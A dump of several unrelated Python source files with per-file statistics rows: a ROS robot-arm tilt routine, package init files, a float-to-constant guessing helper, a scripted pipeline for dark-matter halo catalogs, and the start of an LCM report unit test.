        #print(circle[2] - (0.01*(float(t)/float(angle+1))))
        pose_target.orientation.x = ori_waypoints[t-1][0]
        pose_target.orientation.y = ori_waypoints[t-1][1]
        pose_target.orientation.z = ori_waypoints[t-1][2]
        pose_target.orientation.w = ori_waypoints[t-1][3]
        waypoints.append(copy.deepcopy(pose_target))
    (plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0)  # waypoints, resolution=1cm, jump_threshold
    retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity)  # Retime trajectory with scaled velocity
    group.execute(retimed_plan, wait=False)
    return waypoints


def translate_tilt(point, axis, angle, velocity, translate_distance):
    '''Tilt primitive motion of robot, translating along z while tilting.

    Parameters:
        point (list): 3-D coordinate of point in rotation axis
        axis (list): 3-D vector of rotation axis (right-hand rule)
        angle (double): angle of tilting
        velocity (double): robot velocity between 0 and 1
        translate_distance (double): distance to translate while tilting
    Returns:
    '''
    # Normalize axis vector
    axis = axis/np.linalg.norm(axis)
    # Pose variables. The parameters can be seen from "$ rosmsg show Pose"
    pose_target = group.get_current_pose().pose
    pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
    ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
    # Tilt center point. Closest point from tcp to axis line
    center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
    # Closest distance from tcp to axis line
    radius = np.linalg.norm(np.subtract(center, pos_initial))
    # Pair of orthogonal vectors in tilt plane
    v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
    v1 = v1/np.linalg.norm(v1)
    v2 = np.cross(axis, v1)
    # Interpolate orientation poses via quaternion slerp
    q = helper.axis_angle2quaternion(axis, angle)
    ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
    ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle, 1.0+1.0/angle, 1.0/angle))
    waypoints = []
    for t in range(1, angle+1):
        circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
        pose_target.position.x = circle[0]
        pose_target.position.y = circle[1]  #+(t/angle)*translate_distance
        pose_target.position.z = circle[2]-(t/angle)*translate_distance
        pose_target.orientation.x = ori_waypoints[t-1][0]
        pose_target.orientation.y = ori_waypoints[t-1][1]
        pose_target.orientation.z = ori_waypoints[t-1][2]
        pose_target.orientation.w = ori_waypoints[t-1][3]
        waypoints.append(copy.deepcopy(pose_target))
    (plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0)  # waypoints, resolution=1cm, jump_threshold
    retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity)  # Retime trajectory with scaled velocity
    group.execute(retimed_plan)


if __name__ == '__main__':
    try:
        rospy.init_node('tilt', anonymous=True)  # initialize the node
        group.set_max_velocity_scaling_factor(1.0)
        motion_primitives.set_joint([0, -90, 90, 90, 90, 0])
        p = group.get_current_pose().pose
        tilt([p.position.x, p.position.y, p.position.z], [0, -1, 0], 90, 0.5)
    except rospy.ROSInterruptException:
        pass
| 47.034632 | 139 | 0.693787 | 1,554 | 10,865 | 4.718147 | 0.107465 | 0.087289 | 0.091653 | 0.030551 | 0.89198 | 0.881206 | 0.871386 | 0.864157 | 0.859111 | 0.859111 | 0 | 0.022154 | 0.189876 | 10,865 | 230 | 140 | 47.23913 | 0.810838 | 0.262586 | 0 | 0.761538 | 0 | 0 | 0.002945 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0.007692 | 0.069231 | 0 | 0.107692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
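All four primitives above interpolate orientation waypoints with `helper.slerp`, which is not included in this file. A stdlib-only sketch of quaternion slerp in the `(x, y, z, w)` convention that `tf` uses — an illustrative reimplementation, not the actual `helper` module:

```python
import math

def slerp(q0, q1, t):
    """Spherical linear interpolation between unit quaternions q0, q1 at t in [0, 1]."""
    dot = sum(a * b for a, b in zip(q0, q1))
    if dot < 0.0:                          # take the short arc
        q1 = [-c for c in q1]
        dot = -dot
    dot = min(dot, 1.0)
    theta = math.acos(dot)                 # angle between the quaternions
    if theta < 1e-8:                       # nearly identical: fall back to lerp
        return [a + t * (b - a) for a, b in zip(q0, q1)]
    s0 = math.sin((1 - t) * theta) / math.sin(theta)
    s1 = math.sin(t * theta) / math.sin(theta)
    return [s0 * a + s1 * b for a, b in zip(q0, q1)]

identity = [0, 0, 0, 1]                                          # no rotation
quarter = [0, 0, math.sin(math.pi / 8), math.cos(math.pi / 8)]   # 45 deg about z
half = slerp(identity, quarter, 0.5)                             # 22.5 deg about z
print(half)
```

Evaluating `slerp` at the `numpy.arange(1.0/angle, 1.0+1.0/angle, 1.0/angle)` fractions used above yields one orientation per degree of tilt.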
a9b94d99a2a5e59d02f2a2fa3d3a6111ada5acfb | 84 | py | Python | vit_retri/engine/__init__.py | ludics/ViT-Retri | 4a17ae8392a0f8145a2f5ee37854e76503c26009 | [
"MIT"
] | 1 | 2021-05-07T02:58:21.000Z | 2021-05-07T02:58:21.000Z | vit_retri/engine/__init__.py | ludics/ViT-Retri | 4a17ae8392a0f8145a2f5ee37854e76503c26009 | [
"MIT"
] | null | null | null | vit_retri/engine/__init__.py | ludics/ViT-Retri | 4a17ae8392a0f8145a2f5ee37854e76503c26009 | [
"MIT"
] | null | null | null | from .trainer import train
from .trainer import setup
from .trainer import set_seed
| 21 | 29 | 0.821429 | 13 | 84 | 5.230769 | 0.538462 | 0.485294 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 84 | 3 | 30 | 28 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a9cfd6df68b45c104f49d4d52c7dacf35255182b | 83 | py | Python | sputr/__init__.py | polishmatt/sputr | 7611d40090c8115dff69912725efc506414ac47a | [
"MIT"
] | 1 | 2017-02-13T23:09:18.000Z | 2017-02-13T23:09:18.000Z | sputr/__init__.py | polishmatt/sputr | 7611d40090c8115dff69912725efc506414ac47a | [
"MIT"
] | 6 | 2017-02-18T20:14:32.000Z | 2017-09-27T19:07:06.000Z | sputr/__init__.py | polishmatt/sputr | 7611d40090c8115dff69912725efc506414ac47a | [
"MIT"
] | null | null | null |
from .sputr import discover
from .sputr import list_tests
from .sputr import run
| 13.833333 | 29 | 0.795181 | 13 | 83 | 5 | 0.538462 | 0.415385 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168675 | 83 | 5 | 30 | 16.6 | 0.942029 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a9ef7f582f1b35183130150ba097a7daa2442da6 | 4,676 | py | Python | geometry/names.py | nlitsme/GeometricShapes | 07c2ef598dedbbf0aef9282e58edfd2f72307b29 | [
"MIT"
] | 2 | 2017-12-29T06:44:19.000Z | 2021-07-19T18:03:01.000Z | geometry/names.py | nlitsme/GeometricShapes | 07c2ef598dedbbf0aef9282e58edfd2f72307b29 | [
"MIT"
] | null | null | null | geometry/names.py | nlitsme/GeometricShapes | 07c2ef598dedbbf0aef9282e58edfd2f72307b29 | [
"MIT"
] | null | null | null | """
Module for finding an expression given a float
Note that this is of course just guessing.
"""
import math
def namednumber(num):
    """ attempt to find exact constant for float """
    def isnear(val):
        return abs(num - val) < 0.00001
    if isnear(0.0): return "0"
    if num < 0:
        sign = "-"
        num = -num
    else:
        sign = ""
    if isnear(1.0): return sign+"1"
    if isnear(math.pi): return sign+"pi"
    if isnear((math.sqrt(6)+math.sqrt(2))/4): return sign+"(sqrt(6)+sqrt(2))/4"
    if isnear((math.sqrt(6)-math.sqrt(2))/4): return sign+"(sqrt(6)-sqrt(2))/4"
    if isnear((math.sqrt(5)+1.0)/2): return sign+"(sqrt(5)+1)/2"
    if isnear((math.sqrt(5)-1.0)/2): return sign+"(sqrt(5)-1)/2"
    if isnear(math.sqrt((math.sqrt(5)+5.0)/2)): return sign+"sqrt((sqrt(5)+5)/2)"
    if isnear(math.atan((math.sqrt(5)+1.0)/2)): return sign+"atan((sqrt(5)+1)/2)"
    if isnear(math.atan((math.sqrt(5)-1.0)/2)): return sign+"atan((sqrt(5)-1)/2)"
    if isnear(math.pi-math.atan((math.sqrt(5)+1.0)/2)): return sign+"(pi-atan((sqrt(5)+1)/2))"
    if isnear(math.pi-math.atan((math.sqrt(5)-1.0)/2)): return sign+"(pi-atan((sqrt(5)-1)/2))"
    for div in range(2, 20):
        if isnear(div): return sign+"%d" % div
        if isnear(1.0/div): return sign+"1/%d" % div
        if isnear(math.sqrt(div)): return sign+"sqrt(%d)" % div
        if isnear(1.0/math.sqrt(div)): return sign+"1/sqrt(%d)" % div
        if isnear(math.pi/div): return sign+"pi/%d" % div
        if isnear(math.atan(div)): return sign+"atan(%d)" % div
        if isnear(math.pi-math.atan(div)): return sign+"(pi-atan(%d))" % div
        if isnear(math.atan(1.0/div)): return sign+"atan(1/%d)" % div
        if isnear(math.pi-math.atan(1.0/div)): return sign+"(pi-atan(1/%d))" % div
        if isnear(math.atan(1.0/div)/2): return sign+"atan(1/%d)/2" % div
        if isnear((math.pi-math.atan(1.0/div))/2): return sign+"(pi-atan(1/%d))/2" % div
        if isnear(math.pi-math.atan(1.0/div)/2): return sign+"(pi-atan(1/%d)/2)" % div
        if isnear((math.pi+math.atan(1.0/div))/2): return sign+"(pi+atan(1/%d))/2" % div
        if isnear(math.atan(math.sqrt(div))): return sign+"atan(sqrt(%d))" % div
        if isnear(math.pi-math.atan(math.sqrt(div))): return sign+"(pi-atan(sqrt(%d)))" % div
        if isnear(math.atan(1.0/math.sqrt(div))): return sign+"atan(1/sqrt(%d))" % div
        if isnear(math.pi-math.atan(1.0/math.sqrt(div))): return sign+"(pi-atan(1/sqrt(%d)))" % div
        if isnear(math.atan(1.0/math.sqrt(div))/2): return sign+"atan(1/sqrt(%d))/2" % div
        if isnear((math.pi-math.atan(1.0/math.sqrt(div)))/2): return sign+"(pi-atan(1/sqrt(%d)))/2" % div
        if isnear(math.pi-math.atan(1.0/math.sqrt(div))/2): return sign+"(pi-atan(1/sqrt(%d))/2)" % div
        if isnear((math.pi+math.atan(1.0/math.sqrt(div)))/2): return sign+"(pi+atan(1/sqrt(%d)))/2" % div
    for div in range(2, 20):
        for mul in range(2, 19):
            if div == mul:
                continue
            if isnear(float(div)/mul): return sign+"%d/%d" % (div, mul)
            if isnear(math.sqrt(div)/mul): return sign+"sqrt(%d)/%d" % (div, mul)
            if isnear(mul*math.pi/div): return sign+"%d*pi/%d" % (mul, div)
    for div in range(2, 20):
        for mul in range(2, 19):
            if div == mul:
                continue
            if isnear(math.atan(float(mul)/div)): return sign+"atan(%d/%d)" % (mul, div)
            if isnear(math.pi-math.atan(float(mul)/div)): return sign+"(pi-atan(%d/%d))" % (mul, div)
            if isnear(math.atan(float(mul)/div)/2): return sign+"atan(%d/%d)/2" % (mul, div)
            if isnear((math.pi-math.atan(float(mul)/div))/2): return sign+"(pi-atan(%d/%d))/2" % (mul, div)
            if isnear(math.pi-math.atan(float(mul)/div)/2): return sign+"(pi-atan(%d/%d)/2)" % (mul, div)
            if isnear((math.pi+math.atan(float(mul)/div))/2): return sign+"(pi+atan(%d/%d))/2" % (mul, div)
            if isnear(math.atan(float(mul)/math.sqrt(div))): return sign+"atan(%d/sqrt(%d))" % (mul, div)
            if isnear(math.pi-math.atan(float(mul)/math.sqrt(div))): return sign+"(pi-atan(%d/sqrt(%d)))" % (mul, div)
            if isnear(math.atan(float(mul)/math.sqrt(div))/2): return sign+"atan(%d/sqrt(%d))/2" % (mul, div)
            if isnear((math.pi-math.atan(float(mul)/math.sqrt(div)))/2): return sign+"(pi-atan(%d/sqrt(%d)))/2" % (mul, div)
            if isnear(math.pi-math.atan(float(mul)/math.sqrt(div))/2): return sign+"(pi-atan(%d/sqrt(%d))/2)" % (mul, div)
            if isnear((math.pi+math.atan(float(mul)/math.sqrt(div)))/2): return sign+"(pi+atan(%d/sqrt(%d)))/2" % (mul, div)
    return str(num)
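A minimal, self-contained sketch of the matching strategy namednumber() relies on: compare the input against a table of candidate expressions with a fixed absolute tolerance and return the first name that is close enough. The helper name and the (much shorter) candidate table here are illustrative only, not part of the module.

```python
import math

def guess_constant(num, tol=1e-5):
    # Candidate closed forms, checked in order; the first near-match wins.
    candidates = [
        ("pi", math.pi),
        ("pi/2", math.pi / 2),
        ("sqrt(2)", math.sqrt(2)),
        ("1/sqrt(2)", 1 / math.sqrt(2)),
        ("(sqrt(5)+1)/2", (math.sqrt(5) + 1) / 2),
    ]
    for name, val in candidates:
        if abs(num - val) < tol:
            return name
    # Fall back to the plain decimal form, as namednumber() does.
    return str(num)
```

Because matches are tested in a fixed order, the table should list more specific expressions before more generic ones, which is why namednumber() checks its special constants before entering the generated-candidate loops.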
| 51.955556 | 124 | 0.567579 | 836 | 4,676 | 3.174641 | 0.062201 | 0.144687 | 0.185381 | 0.163904 | 0.866616 | 0.826677 | 0.77468 | 0.720422 | 0.681989 | 0.616428 | 0 | 0.043167 | 0.192472 | 4,676 | 89 | 125 | 52.539326 | 0.659693 | 0.028229 | 0 | 0.134328 | 0 | 0 | 0.158348 | 0.051237 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.014925 | 0.014925 | 0.074627 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a9f629fd2164d061204704b44cab65dcf40afe9c | 6,651 | py | Python | bin/bin_MD/MD-split-distinct-sub.py | JohanComparat/nbody-npt-functions | a034db4e5a9b2f87dc42eeb6059c4dd280589e4a | [
"CC0-1.0"
] | 4 | 2017-11-07T02:15:46.000Z | 2022-03-03T01:35:53.000Z | bin/bin_MD/MD-split-distinct-sub.py | JohanComparat/nbody-npt-functions | a034db4e5a9b2f87dc42eeb6059c4dd280589e4a | [
"CC0-1.0"
] | null | null | null | bin/bin_MD/MD-split-distinct-sub.py | JohanComparat/nbody-npt-functions | a034db4e5a9b2f87dc42eeb6059c4dd280589e4a | [
"CC0-1.0"
] | 2 | 2020-08-12T14:26:38.000Z | 2021-09-14T06:08:58.000Z | import glob
import os
import time
import numpy as n
import sys
def create_sat_files(fileName):
    outFileName = fileName[:-5] + "_sat.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tpipe ifmt=fits in=""" + fileName + """ cmd='select "pid>=0"' cmd='replacecol pid toInteger(pid)' cmd='replacecol id toInteger(id)' omode=out ofmt=fits out=""" + outFileName
    os.system(command)

def create_cen_files(fileName):
    outFileName = fileName[:-5] + "_cen.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tpipe ifmt=fits in=""" + fileName + """ cmd='select "pid==-1"' cmd='delcols "pid x y z"' cmd='replacecol id toInteger(id)' omode=out ofmt=fits out=""" + outFileName
    os.system(command)

def concat_sat_files(fileName):
    os.system("ls " + fileName[:-5] + "*_sat.fits > list2Concat")
    outFileName = fileName[:-5] + "_sat_all.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tcat ifmt=fits in=@list2Concat omode=out ofmt=fits out=""" + outFileName
    os.system(command)
    os.system("rm list2Concat")

def concat_cen_files(fileName):
    os.system("ls " + fileName[:-5] + "*_cen.fits > list2Concat")
    outFileName = fileName[:-5] + "_cen_all.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tcat ifmt=fits in=@list2Concat omode=out ofmt=fits out=""" + outFileName
    os.system(command)
    os.system("rm list2Concat")

def match_sat_cen(fileName):
    satFileName = fileName[:-5] + "_sat_all.fits"
    cenFileName = fileName[:-5] + "_cen_all.fits"
    outFileNameA = fileName[:-5] + "_subhalos_inDistinct.fits"
    outFileNameB = fileName[:-5] + "_subhalos_inSat.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1=""" + satFileName + """ ifmt2=fits in2=""" + cenFileName + """ find=all matcher=exact join=1and2 fixcols=all suffix1="_sat" suffix2="_cen" values1=pid values2=id omode=out ofmt=fits out=""" + outFileNameA
    os.system(command)
    command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1=""" + satFileName + """ ifmt2=fits in2=""" + satFileName + """ find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n" suffix2="_sat_n_1" values1=pid values2=id omode=out ofmt=fits out=""" + outFileNameB
    os.system(command)

def match_sat_cen_d2(fileName):
    satFileName = fileName[:-5] + "_sat_all.fits"
    cenFileName = fileName[:-5] + "_cen_all.fits"
    sat_in_sat_file = fileName[:-5] + "_subhalos_inSat.fits"
    outFileNameB = fileName[:-5] + "_subhalos_inSat2.fits"
    outFileNameA = fileName[:-5] + "_subhalos_inDistinct2.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1=""" + sat_in_sat_file + """ ifmt2=fits in2=""" + cenFileName + """ find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_1" suffix2="_cen" values1=pid_sat_n_1 values2=id omode=out ofmt=fits out=""" + outFileNameA
    os.system(command)
    command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1=""" + sat_in_sat_file + """ ifmt2=fits in2=""" + satFileName + """ find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_1" suffix2="_sat_n_2" values1=pid_sat_n_1 values2=id omode=out ofmt=fits out=""" + outFileNameB
    os.system(command)

def match_sat_cen_d3(fileName):
    satFileName = fileName[:-5] + "_sat_all.fits"
    cenFileName = fileName[:-5] + "_cen_all.fits"
    sat_in_sat_file = fileName[:-5] + "_subhalos_inSat2.fits"
    outFileNameB = fileName[:-5] + "_subhalos_inSat3.fits"
    outFileNameA = fileName[:-5] + "_subhalos_inDistinct3.fits"
    command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1=""" + sat_in_sat_file + """ ifmt2=fits in2=""" + cenFileName + """ find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_2" suffix2="_cen" values1=pid_sat_n_2 values2=id omode=out ofmt=fits out=""" + outFileNameA
    os.system(command)
    command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1=""" + sat_in_sat_file + """ ifmt2=fits in2=""" + satFileName + """ find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_2" suffix2="_sat_n_3" values1=pid_sat_n_2 values2=id omode=out ofmt=fits out=""" + outFileNameB
    os.system(command)

def process_MD(files, outs):
    t0 = time.time()
    for file in files:
        print(file)
        create_sat_files(file)
        print("create sat", time.time() - t0)
        create_cen_files(file)
        print("create cen", time.time() - t0)
        print("-----------------------------------------")
    t0 = time.time()
    for file in outs:
        print(file)
        concat_sat_files(file)
        print("concat sat", time.time() - t0)
        concat_cen_files(file)
        print("concat cen", time.time() - t0)
        print("-----------------------------------------")
    t0 = time.time()
    for file in outs:
        match_sat_cen(file)
        print("match", time.time() - t0)

def match_cats(outs):
    t0 = time.time()
    for file in outs:
        match_sat_cen(file)
        match_sat_cen_d2(file)
        match_sat_cen_d3(file)
        print("match", time.time() - t0)
files = n.array(glob.glob("/data2/DATA/eBOSS/DarkSkies/snapshots/ds14_*_PM_Nb_*.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/DarkSkies/snapshots/ds14_*.dat"))
outs.sort()
process_MD(files, outs)
match_cats(outs)
sys.exit()
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_0.4Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_0.4Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_1Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_1Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5GpcNW/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5GpcNW/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4GpcNW/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4GpcNW/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
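The stilts invocations above are assembled by string concatenation and handed to os.system(). As a hedged alternative sketch, the same command can be built as an explicit argument vector for subprocess, which sidesteps shell-quoting pitfalls; the helper name and argument layout here are illustrative, with the flags taken from the tpipe commands used above.

```python
import subprocess

def stilts_tpipe_select(in_file, out_file, expr,
                        jar="/home2/jcomparat/code/stilts.jar"):
    # Argument vector for: java -jar stilts.jar tpipe ifmt=fits ...
    # Returning a list (instead of one shell string) lets subprocess.run
    # pass each argument through unmodified, with no shell involved.
    return ["java", "-jar", jar, "tpipe",
            "ifmt=fits", "in=" + in_file,
            'cmd=select "%s"' % expr,
            "omode=out", "ofmt=fits", "out=" + out_file]

# subprocess.run(stilts_tpipe_select("snap.fits", "snap_sat.fits", "pid>=0"))
```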
| 44.939189 | 294 | 0.730868 | 1,007 | 6,651 | 4.63853 | 0.107249 | 0.038536 | 0.029972 | 0.041961 | 0.900664 | 0.824021 | 0.813316 | 0.793834 | 0.792764 | 0.780133 | 0 | 0.028002 | 0.087205 | 6,651 | 147 | 295 | 45.244898 | 0.741394 | 0.020749 | 0 | 0.470588 | 0 | 0.109244 | 0.512911 | 0.233477 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042017 | null | null | 0.084034 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e751ad213de5a7a3bfcf8a388bcd29e5bdaed7f8 | 9,516 | py | Python | api/tests/test_report.py | equinor/lcm | 338bf67e6eb412446e469b4c73f7000990445ebd | [
"MIT"
] | 3 | 2020-12-02T11:14:31.000Z | 2021-12-09T16:53:53.000Z | api/tests/test_report.py | equinor/lcm | 338bf67e6eb412446e469b4c73f7000990445ebd | [
"MIT"
] | 76 | 2020-09-29T10:59:10.000Z | 2022-01-03T07:41:29.000Z | api/tests/test_report.py | equinor/lcm | 338bf67e6eb412446e469b4c73f7000990445ebd | [
"MIT"
] | 2 | 2021-01-25T14:24:57.000Z | 2021-01-25T14:51:16.000Z | import unittest
from pathlib import Path
from config import Config
from controllers.report import create_report
request = {
"fitness": 4.4,
"curve": [
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.66132013232447,
24.405921000051023,
24.405921000051023,
24.405921000051023,
24.405921000051023,
24.405921000051023,
24.263870398510857,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.14494941140656,
22.79260349905688,
22.76124725733934,
22.76124725733934,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.03365351452154,
22.03365351452154,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
21.936000287548488,
21.371589345517165,
21.05947717635218,
21.05947717635218,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.70095921290463,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.569920974028108,
19.569920974028108,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
18.834064835696655,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.80877678463467,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.669540861902142,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.337756146654282,
16.337756146654282,
15.929791913230055,
15.929791913230055,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.860424440477974,
14.539091423284532,
14.539091423284532,
14.539091423284532,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
13.846770027057604,
13.846770027057604,
13.846770027057604,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
12.854682185001785,
12.854682185001785,
12.269860280355859,
12.269860280355859,
12.269860280355859,
12.269860280355859,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
